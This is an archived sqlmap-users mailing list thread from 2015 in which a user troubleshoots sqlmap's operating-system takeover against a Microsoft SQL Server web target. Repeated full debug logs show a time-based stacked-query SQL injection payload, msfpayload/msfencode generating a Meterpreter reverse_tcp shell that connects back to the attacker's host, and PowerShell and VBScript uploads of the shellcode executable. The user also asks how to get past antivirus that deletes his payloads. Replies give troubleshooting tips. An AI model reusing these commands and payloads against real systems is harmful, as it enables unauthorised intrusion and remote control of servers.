>>> [10:03:33] [DEBUG] forcing back-end DBMS to user defined value
>>> [10:03:33] [DEBUG] setting the takeover out-of-band functionality
>>> [10:03:33] [DEBUG] provided Metasploit Framework path
>>> '/opt/metasploit/apps/pro/msf3' is valid
>>> [10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the
>>> Cookie
>>> [10:03:33] [DEBUG] resolving hostname 'mytarget.com'
>>> [10:03:33] [INFO] testing connection to the target URL
>>> [10:03:48] [DEBUG] declared web page charset 'utf-8'
>>> sqlmap got a 302 redirect to '
>>> https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to
>>> follow? [Y/n] Y
>>> redirect is a result of a POST request. Do you want to resend original
>>> POST data to a new location? [Y/n] Y
>>> [10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104]
>>> Connection reset by peer')
>>> [10:03:56] [DEBUG] heuristically checking if the target is protected by
>>> some kind of WAF/IPS/IDS
>>> sqlmap identified the following injection points with a total of 0
>>> HTTP(s) requests:
>>> ---
>>> Parameter: testNumber (POST)
>>>     Type: stacked queries
>>>     Title: Microsoft SQL Server/Sybase stacked queries
>>>     Payload:
>>> example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333';
>>> WAITFOR DELAY '0:0:5'--&testPassword=3243
>>>     Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
>>> ---
>>> [10:03:56] [INFO] testing Microsoft SQL Server
>>> [10:03:56] [INFO] confirming Microsoft SQL Server
>>> [10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server
>>> back-end DBMS: Microsoft SQL Server 2008
>>> how do you want to establish the tunnel?
>>> [1] TCP: Metasploit Framework (default)
>>> [2] ICMP: icmpsh - ICMP tunneling
>>> > 1
>>> [10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL
>>> Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā as temporary files directory
>>> [10:04:00] [INFO] testing if current user is DBA
>>> [10:04:00] [DEBUG] creating a support table to write commands standard
>>> output to
>>> [10:04:00] [WARNING] time-based comparison requires larger statistical
>>> model, please wait..............................
>>> [10:04:04] [WARNING] it is very important not to stress the network
>>> adapter during usage of time-based payloads to prevent potential errors
>>> [10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable
>>> [10:04:04] [DEBUG] performed 3 queries in 0.26 seconds
>>> [10:04:04] [WARNING] in case of continuous data retrieval problems you
>>> are advised to try a switch '--no-cast' or switch '--hex'
>>> [10:04:05] [ERROR] unable to retrieve xp_cmdshell output
>>> [10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode
>>> which connection type do you want to use?
>>> [1] Reverse TCP: Connect back from the database host to this machine
>>> (default)
>>> [2] Reverse TCP: Try to connect back from the database host to this
>>> machine, on all ports example3ween the specified and 65535
>>> [3] Reverse HTTP: Connect back from the database host to this machine
>>> tunnelling traffic over HTTP
>>> [4] Reverse HTTPS: Connect back from the database host to this machine
>>> tunnelling traffic over HTTPS
>>> [5] Bind TCP: Listen on the database host for a connection
>>> > 1
>>> what is the local address? [192.168.1.8]
>>> which local port number do you want to use? [61371]
>>> which payload do you want to use?
>>> [1] Meterpreter (default)
>>> [2] Shell
>>> [3] VNC
>>> > 1
>>> [10:04:17] [DEBUG] executing local command:
>>> /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp
>>> EXITFUNC=process MQORT=61371 LHOST=192.168.1.8 R |
>>> /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/aMQha_mixed -o
>>> "/root/.sqlmap/output/mytarget.com/tmpmbykt" -t raw BufferRegister=EAX
>>> [10:04:17] [INFO] creation in progress .................. done
>>> [10:04:35] [DEBUG] the shellcode size is 308 bytes
>>> [10:04:35] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft
>>> SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā/tmpsebykt.exe'
>>> [10:04:35] [DEBUG] going to upload the binary file with stacked query
>>> SQL injection technique
>>> [10:04:35] [INFO] using PowerShell to write the binary file content to
>>> file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
>>> Ā\tmpsebykt.exe'
>>> [10:04:35] [DEBUG] uploading the base64-encoded file to D:\Program
>>> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpfidjf.txt,
>>> please wait..
>>> [10:04:36] [DEBUG] uploading the PowerShell base64-decoding script to
>>> D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
>>> Ā\tmppsbcbi.ps1
>>> [10:04:36] [DEBUG] executing the PowerShell base64-decoding script to
>>> write the D:\Program Files\Microsoft SQL
>>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe file, please wait..
>>> [10:04:37] [WARNING] if you experience problems with non-ASCII
>>> identifier names you are advised to rerun with '--tamper=charunicodeencode'
>>> [10:04:37] [DEBUG] checking the length of the remote file D:\Program
>>> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe
>>> [10:04:37] [INFO] retrieved:
>>> [10:04:37] [DEBUG] performed 3 queries in 0.26 seconds
>>> [10:04:37] [WARNING] it looks like the file has not been written
>>> (usually occurs if the DBMS process' user has no write privileges in the
>>> destination path)
>>> do you want to try to upload the file with the custom Visual Basic
>>> script technique? [Y/n] Y
>>> [10:04:41] [INFO] using a custom visual basic script to write the binary
>>> file content to file 'D:\Program Files\Microsoft SQL
>>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe', please wait..
>>> [10:04:41] [DEBUG] uploading the file base64-encoded content to
>>> D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
>>> Ā\tmpfegab.txt, please wait..
>>> [10:04:41] [CRITICAL] page not found (404)
>>> [10:04:41] [WARNING] HTTP error codes detected during run:
>>> 404 (Not Found) - 1 times
>>> [10:04:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean
>>> that some kind of protection is involved (e.g. WAF)
>>>
>>> [*] shutting down at 10:04:41
>>>
>>> root@kali:~#
>>>
>>>
>>> -------screen logs end-------
>>>
>>>
>>> Please help!!
>>>
>>>
>>>
>>>
>>>
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Don't Limit Your Business. Reach for the Cloud.
>>> GigeNET's Cloud Solutions provide you with the tools and support that
>>> you need to offload your IT needs and focus on growing your business.
>>> Configured For All Businesses. Start Your Cloud Today.
>>> https://www.gigenetcloud.com/
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Error with operating system takeover (meterpreter)

[Peter L. <myp...@gm...>]

Hi,
Thanks for your reply.

This time I tried with --fresh-queries without specific --techniques.

why am I getting error "page not found (404)" again and again? Does it
indicate that file is being written but is deleted by Anti-Virus control or
something and that's why while calling the uploaded file 404 error is
appearing, Can this be the case ? Need your opinion and expertise.


Thanks


--start---

root@kali:~# sqlmap -r mytarget_login -p testNumber --os-pwn
--msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf8 -v 2 --fresh-queries


which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
[11:12:52] [DEBUG] executing local command:
/opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp
EXITFUNC=process LPORT=20652 LHOST=192.168.1.8 R |
/opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/alpha_mixed -o
"/root/.sqlmap/output/myexample.com/tmpmwjvg" -t raw BufferRegister=EAX
[11:12:52] [INFO] creation in progress .................. done
[11:13:10] [DEBUG] the shellcode size is 308 bytes
[11:13:10] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft
SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLoĀ/tmpsewjvg.exe'
[11:13:10] [DEBUG] going to upload the binary file with stacked query SQL
injection technique
[11:13:10] [INFO] using PowerShell to write the binary file content to file
'D:\Program Files\Microsoft SQL
Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe'
[11:13:10] [DEBUG] uploading the base64-encoded file to D:\Program
Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfyort.txt,
please wait..
[11:13:12] [DEBUG] uploading the PowerShell base64-decoding script to
D:\Program Files\Microsoft SQL
Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmppsfpoc.ps1
[11:13:12] [DEBUG] executing the PowerShell base64-decoding script to write
the D:\Program Files\Microsoft SQL
Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe file, please wait..
[11:13:12] [WARNING] if you experience problems with non-ASCII identifier
names you are advised to rerun with '--tamper=charunicodeencode'
[11:13:12] [DEBUG] checking the length of the remote file D:\Program
Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe
[11:13:12] [INFO] retrieved:
[11:13:13] [DEBUG] performed 3 queries in 0.37 seconds
[11:13:13] [WARNING] it looks like the file has not been written (usually
occurs if the DBMS process' user has no write privileges in the destination
path)
do you want to try to upload the file with the custom Visual Basic script
technique? [Y/n] y
[11:13:15] [INFO] using a custom visual basic script to write the binary
file content to file 'D:\Program Files\Microsoft SQL
Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe', please wait..
[11:13:15] [DEBUG] uploading the file base64-encoded content to D:\Program
Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfzlhn.txt,
please wait..
[11:13:16] [CRITICAL] page not found (404)
[11:13:16] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[11:13:16] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that
some kind of protection is involved (e.g. WAF)

[*] shutting down at 11:13:16


--end---


















On Thu, Jul 2, 2015 at 3:56 AM, Miroslav Stampar <mir...@gm...
> wrote:

> Hi.
>
> 1) First of all, please don't restrain sqlmap to only use "stacked" SQLi.
> That way you'll kill the possibility to get perfectly valid results with
> other techniques
> 2) In current state, you've got some "trashy" characters (because of
> combination of laggy connection and stacked SQLi), like: "D:/Program
> Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā". Please use
> --fresh-queries in such situations (once per run where you expect resume of
> trashy chars) to force sqlmap to try to retrieve the problematic value once
> again.
>
> Bye
>
> On Wed, Jul 1, 2015 at 4:55 PM, Peter Laboratra <myp...@gm...>
> wrote:
>
>> Hi All,
>>
>> In first phase of our test we discovered Target URL is vulnerable and we
>> managed to retrieved lots of information such as --users, --dbs, some of
>> --tables and lots more. All this retrieval was very slow probably due to
>> time-based vulnerability; however tried through all (BEUSTQ) and found same
>> state.
>>
>> During an attempt after few days of our success we noticed some of the
>> parameter is not working and we are receiving errors like for instance
>> during requery for --users we received error "[09:39:23] [CRITICAL] unable
>> to retrieve the number of database users". During requery for -U sa
>> --passwords we received "unnable to retrieve the password hashes for the
>> database users (probably because the session user has no read privileges
>> over the relevant system database table)".
>>
>> We moved to OS takeover, initially get error for xp_cmdshell however
>> activated and confirmed using SQLNinja and moved on to get --os-shell,
>> executed some of commands like "hostname", "whoami" and successfully
>> retrieved its output.
>>
>> Now after few minutes we noted that we are not getting any output of any
>> command with message "No output".
>>
>> We moved to --os-pwn + --msf-path, But again with no success on
>> meterpreter or VNC.
>> received error "HTTP error codes detected during run:
>> 404 (Not Found) - 1 times"
>>
>> I'm attaching screen log, please help me with this if thr is any scope
>> available.
>> Thanks in Advance.
>>
>>
>>
>> -------screen logs start-------
>>
>> root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S
>> --dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t
>> test_msf7 -v 2
>>          _
>>  ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150519}
>> |_ -| . | |     | .'| . |
>> |___|_  |_|_|_|_|__,|  _|
>>       |_|           |_|   http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
>> mutual consent is illegal. It is the end user's responsibility to obey all
>> applicable local, state and federal laws. Developers assume no liability
>> and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 10:03:33
>>
>> mytarget_login
>> [10:03:33] [INFO] parsing HTTP request from 'mytarget_login'
>> [10:03:33] [DEBUG] not a valid WebScarab log data
>> [10:03:33] [DEBUG] cleaning up configuration parameters
>> test_msf7
>> mytarget_login
>> /opt/metasploit/apps/pro/msf3
>> [10:03:33] [INFO] setting file for logging HTTP traffic
>> [10:03:33] [DEBUG] setting the HTTP timeout
>> [10:03:33] [DEBUG] creating HTTP requests opener object
>> [10:03:33] [DEBUG] forcing back-end DBMS to user defined value
>> [10:03:33] [DEBUG] setting the takeover out-of-band functionality
>> [10:03:33] [DEBUG] provided Metasploit Framework path
>> '/opt/metasploit/apps/pro/msf3' is valid
>> [10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the
>> Cookie
>> [10:03:33] [DEBUG] resolving hostname 'mytarget.com'
>> [10:03:33] [INFO] testing connection to the target URL
>> [10:03:48] [DEBUG] declared web page charset 'utf-8'
>> sqlmap got a 302 redirect to '
>> https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to
>> follow? [Y/n] Y
>> redirect is a result of a POST request. Do you want to resend original
>> POST data to a new location? [Y/n] Y
>> [10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104] Connection
>> reset by peer')
>> [10:03:56] [DEBUG] heuristically checking if the target is protected by
>> some kind of WAF/IPS/IDS
>> sqlmap identified the following injection points with a total of 0
>> HTTP(s) requests:
>> ---
>> Parameter: testNumber (POST)
>>     Type: stacked queries
>>     Title: Microsoft SQL Server/Sybase stacked queries
>>     Payload:
>> example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333';
>> WAITFOR DELAY '0:0:5'--&testPassword=3243
>>     Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
>> ---
>> [10:03:56] [INFO] testing Microsoft SQL Server
>> [10:03:56] [INFO] confirming Microsoft SQL Server
>> [10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server
>> back-end DBMS: Microsoft SQL Server 2008
>> how do you want to establish the tunnel?
>> [1] TCP: Metasploit Framework (default)
>> [2] ICMP: icmpsh - ICMP tunneling
>> > 1
>> [10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL
>> Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā as temporary files directory
>> [10:04:00] [INFO] testing if current user is DBA
>> [10:04:00] [DEBUG] creating a support table to write commands standard
>> output to
>> [10:04:00] [WARNING] time-based comparison requires larger statistical
>> model, please wait..............................
>> [10:04:04] [WARNING] it is very important not to stress the network
>> adapter during usage of time-based payloads to prevent potential errors
>> [10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable
>> [10:04:04] [DEBUG] performed 3 queries in 0.26 seconds
>> [10:04:04] [WARNING] in case of continuous data retrieval problems you
>> are advised to try a switch '--no-cast' or switch '--hex'
>> [10:04:05] [ERROR] unable to retrieve xp_cmdshell output
>> [10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode
>> which connection type do you want to use?
>> [1] Reverse TCP: Connect back from the database host to this machine
>> (default)
>> [2] Reverse TCP: Try to connect back from the database host to this
>> machine, on all ports example3ween the specified and 65535
>> [3] Reverse HTTP: Connect back from the database host to this machine
>> tunnelling traffic over HTTP
>> [4] Reverse HTTPS: Connect back from the database host to this machine
>> tunnelling traffic over HTTPS
>> [5] Bind TCP: Listen on the database host for a connection
>> > 1
>> what is the local address? [192.168.1.8]
>> which local port number do you want to use? [61371]
>> which payload do you want to use?
>> [1] Meterpreter (default)
>> [2] Shell
>> [3] VNC
>> > 1
>> [10:04:17] [DEBUG] executing local command:
>> /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp
>> EXITFUNC=process MQORT=61371 LHOST=192.168.1.8 R |
>> /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/aMQha_mixed -o
>> "/root/.sqlmap/output/mytarget.com/tmpmbykt" -t raw BufferRegister=EAX
>> [10:04:17] [INFO] creation in progress .................. done
>> [10:04:35] [DEBUG] the shellcode size is 308 bytes
>> [10:04:35] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft
>> SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā/tmpsebykt.exe'
>> [10:04:35] [DEBUG] going to upload the binary file with stacked query SQL
>> injection technique
>> [10:04:35] [INFO] using PowerShell to write the binary file content to
>> file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
>> Ā\tmpsebykt.exe'
>> [10:04:35] [DEBUG] uploading the base64-encoded file to D:\Program
>> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpfidjf.txt,
>> please wait..
>> [10:04:36] [DEBUG] uploading the PowerShell base64-decoding script to
>> D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
>> Ā\tmppsbcbi.ps1
>> [10:04:36] [DEBUG] executing the PowerShell base64-decoding script to
>> write the D:\Program Files\Microsoft SQL
>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe file, please wait..
>> [10:04:37] [WARNING] if you experience problems with non-ASCII identifier
>> names you are advised to rerun with '--tamper=charunicodeencode'
>> [10:04:37] [DEBUG] checking the length of the remote file D:\Program
>> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe
>> [10:04:37] [INFO] retrieved:
>> [10:04:37] [DEBUG] performed 3 queries in 0.26 seconds
>> [10:04:37] [WARNING] it looks like the file has not been written (usually
>> occurs if the DBMS process' user has no write privileges in the destination
>> path)
>> do you want to try to upload the file with the custom Visual Basic script
>> technique? [Y/n] Y
>> [10:04:41] [INFO] using a custom visual basic script to write the binary
>> file content to file 'D:\Program Files\Microsoft SQL
>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe', please wait..
>> [10:04:41] [DEBUG] uploading the file base64-encoded content to
>> D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
>> Ā\tmpfegab.txt, please wait..
>> [10:04:41] [CRITICAL] page not found (404)
>> [10:04:41] [WARNING] HTTP error codes detected during run:
>> 404 (Not Found) - 1 times
>> [10:04:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean
>> that some kind of protection is involved (e.g. WAF)
>>
>> [*] shutting down at 10:04:41
>>
>> root@kali:~#
>>
>>
>> -------screen logs end-------
>>
>>
>> Please help!!
>>
>>
>>
>>
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Don't Limit Your Business. Reach for the Cloud.
>> GigeNET's Cloud Solutions provide you with the tools and support that
>> you need to offload your IT needs and focus on growing your business.
>> Configured For All Businesses. Start Your Cloud Today.
>> https://www.gigenetcloud.com/
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>

Re: [sqlmap-users] Error with operating system takeover (meterpreter)

[Miroslav S. <mir...@gm...>]

Hi.

1) First of all, please don't restrain sqlmap to only use "stacked" SQLi.
That way you'll kill the possibility to get perfectly valid results with
other techniques
2) In current state, you've got some "trashy" characters (because of
combination of laggy connection and stacked SQLi), like: "D:/Program
Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā". Please use
--fresh-queries in such situations (once per run where you expect resume of
trashy chars) to force sqlmap to try to retrieve the problematic value once
again.

Bye

On Wed, Jul 1, 2015 at 4:55 PM, Peter Laboratra <myp...@gm...>
wrote:

> Hi All,
>
> In first phase of our test we discovered Target URL is vulnerable and we
> managed to retrieved lots of information such as --users, --dbs, some of
> --tables and lots more. All this retrieval was very slow probably due to
> time-based vulnerability; however tried through all (BEUSTQ) and found same
> state.
>
> During an attempt after few days of our success we noticed some of the
> parameter is not working and we are receiving errors like for instance
> during requery for --users we received error "[09:39:23] [CRITICAL] unable
> to retrieve the number of database users". During requery for -U sa
> --passwords we received "unnable to retrieve the password hashes for the
> database users (probably because the session user has no read privileges
> over the relevant system database table)".
>
> We moved to OS takeover, initially get error for xp_cmdshell however
> activated and confirmed using SQLNinja and moved on to get --os-shell,
> executed some of commands like "hostname", "whoami" and successfully
> retrieved its output.
>
> Now after few minutes we noted that we are not getting any output of any
> command with message "No output".
>
> We moved to --os-pwn + --msf-path, But again with no success on
> meterpreter or VNC.
> received error "HTTP error codes detected during run:
> 404 (Not Found) - 1 times"
>
> I'm attaching screen log, please help me with this if thr is any scope
> available.
> Thanks in Advance.
>
>
>
> -------screen logs start-------
>
> root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S
> --dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t
> test_msf7 -v 2
>          _
>  ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150519}
> |_ -| . | |     | .'| . |
> |___|_  |_|_|_|_|__,|  _|
>       |_|           |_|   http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 10:03:33
>
> mytarget_login
> [10:03:33] [INFO] parsing HTTP request from 'mytarget_login'
> [10:03:33] [DEBUG] not a valid WebScarab log data
> [10:03:33] [DEBUG] cleaning up configuration parameters
> test_msf7
> mytarget_login
> /opt/metasploit/apps/pro/msf3
> [10:03:33] [INFO] setting file for logging HTTP traffic
> [10:03:33] [DEBUG] setting the HTTP timeout
> [10:03:33] [DEBUG] creating HTTP requests opener object
> [10:03:33] [DEBUG] forcing back-end DBMS to user defined value
> [10:03:33] [DEBUG] setting the takeover out-of-band functionality
> [10:03:33] [DEBUG] provided Metasploit Framework path
> '/opt/metasploit/apps/pro/msf3' is valid
> [10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the Cookie
> [10:03:33] [DEBUG] resolving hostname 'mytarget.com'
> [10:03:33] [INFO] testing connection to the target URL
> [10:03:48] [DEBUG] declared web page charset 'utf-8'
> sqlmap got a 302 redirect to '
> https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to
> follow? [Y/n] Y
> redirect is a result of a POST request. Do you want to resend original
> POST data to a new location? [Y/n] Y
> [10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104] Connection
> reset by peer')
> [10:03:56] [DEBUG] heuristically checking if the target is protected by
> some kind of WAF/IPS/IDS
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Parameter: testNumber (POST)
>     Type: stacked queries
>     Title: Microsoft SQL Server/Sybase stacked queries
>     Payload:
> example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333';
> WAITFOR DELAY '0:0:5'--&testPassword=3243
>     Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
> ---
> [10:03:56] [INFO] testing Microsoft SQL Server
> [10:03:56] [INFO] confirming Microsoft SQL Server
> [10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server
> back-end DBMS: Microsoft SQL Server 2008
> how do you want to establish the tunnel?
> [1] TCP: Metasploit Framework (default)
> [2] ICMP: icmpsh - ICMP tunneling
> > 1
> [10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL
> Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā as temporary files directory
> [10:04:00] [INFO] testing if current user is DBA
> [10:04:00] [DEBUG] creating a support table to write commands standard
> output to
> [10:04:00] [WARNING] time-based comparison requires larger statistical
> model, please wait..............................
> [10:04:04] [WARNING] it is very important not to stress the network
> adapter during usage of time-based payloads to prevent potential errors
> [10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable
> [10:04:04] [DEBUG] performed 3 queries in 0.26 seconds
> [10:04:04] [WARNING] in case of continuous data retrieval problems you are
> advised to try a switch '--no-cast' or switch '--hex'
> [10:04:05] [ERROR] unable to retrieve xp_cmdshell output
> [10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode
> which connection type do you want to use?
> [1] Reverse TCP: Connect back from the database host to this machine
> (default)
> [2] Reverse TCP: Try to connect back from the database host to this
> machine, on all ports example3ween the specified and 65535
> [3] Reverse HTTP: Connect back from the database host to this machine
> tunnelling traffic over HTTP
> [4] Reverse HTTPS: Connect back from the database host to this machine
> tunnelling traffic over HTTPS
> [5] Bind TCP: Listen on the database host for a connection
> > 1
> what is the local address? [192.168.1.8]
> which local port number do you want to use? [61371]
> which payload do you want to use?
> [1] Meterpreter (default)
> [2] Shell
> [3] VNC
> > 1
> [10:04:17] [DEBUG] executing local command:
> /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp
> EXITFUNC=process MQORT=61371 LHOST=192.168.1.8 R |
> /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/aMQha_mixed -o
> "/root/.sqlmap/output/mytarget.com/tmpmbykt" -t raw BufferRegister=EAX
> [10:04:17] [INFO] creation in progress .................. done
> [10:04:35] [DEBUG] the shellcode size is 308 bytes
> [10:04:35] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft
> SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā/tmpsebykt.exe'
> [10:04:35] [DEBUG] going to upload the binary file with stacked query SQL
> injection technique
> [10:04:35] [INFO] using PowerShell to write the binary file content to
> file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
> Ā\tmpsebykt.exe'
> [10:04:35] [DEBUG] uploading the base64-encoded file to D:\Program
> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpfidjf.txt,
> please wait..
> [10:04:36] [DEBUG] uploading the PowerShell base64-decoding script to
> D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
> Ā\tmppsbcbi.ps1
> [10:04:36] [DEBUG] executing the PowerShell base64-decoding script to
> write the D:\Program Files\Microsoft SQL
> Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe file, please wait..
> [10:04:37] [WARNING] if you experience problems with non-ASCII identifier
> names you are advised to rerun with '--tamper=charunicodeencode'
> [10:04:37] [DEBUG] checking the length of the remote file D:\Program
> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe
> [10:04:37] [INFO] retrieved:
> [10:04:37] [DEBUG] performed 3 queries in 0.26 seconds
> [10:04:37] [WARNING] it looks like the file has not been written (usually
> occurs if the DBMS process' user has no write privileges in the destination
> path)
> do you want to try to upload the file with the custom Visual Basic script
> technique? [Y/n] Y
> [10:04:41] [INFO] using a custom visual basic script to write the binary
> file content to file 'D:\Program Files\Microsoft SQL
> Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe', please wait..
> [10:04:41] [DEBUG] uploading the file base64-encoded content to D:\Program
> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpfegab.txt,
> please wait..
> [10:04:41] [CRITICAL] page not found (404)
> [10:04:41] [WARNING] HTTP error codes detected during run:
> 404 (Not Found) - 1 times
> [10:04:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean
> that some kind of protection is involved (e.g. WAF)
>
> [*] shutting down at 10:04:41
>
> root@kali:~#
>
>
> -------screen logs end-------
>
>
> Please help!!
>
>
>
>
>
>
>
> ------------------------------------------------------------------------------
> Don't Limit Your Business. Reach for the Cloud.
> GigeNET's Cloud Solutions provide you with the tools and support that
> you need to offload your IT needs and focus on growing your business.
> Configured For All Businesses. Start Your Cloud Today.
> https://www.gigenetcloud.com/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Upload file with SQL Injection

[Brandon P. <bpe...@gm...>]

--file-write allows you to write a file, and has the ability to check if
the file was written by testing the size of the file to the file locally
you have written to ensure it was written ~correctly.

On Wed, Jul 1, 2015 at 10:02 AM, Peter Laboratra <myp...@gm...>
wrote:

> Hi All,
>
> Need help in uploading a non-malicious file on vulnerable target.
>
> In several cases I noted that shell upload or meterpreter fails due to an
> effective & active Anti-Virus installed on vulnerable target as it got
> delete due to malicious nature (even after certain level of msf encoding.
>
> I also noted that in most of the cases method of uploading using
> --sql-shell fail due to lack of stack-query related issues.
>
> In that case is there a way to upload a file which is not malicious if
> objective is not to take control of system and just requires uploading a
> file.
>
>
>
>
>
> ------------------------------------------------------------------------------
> Don't Limit Your Business. Reach for the Cloud.
> GigeNET's Cloud Solutions provide you with the tools and support that
> you need to offload your IT needs and focus on growing your business.
> Configured For All Businesses. Start Your Cloud Today.
> https://www.gigenetcloud.com/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
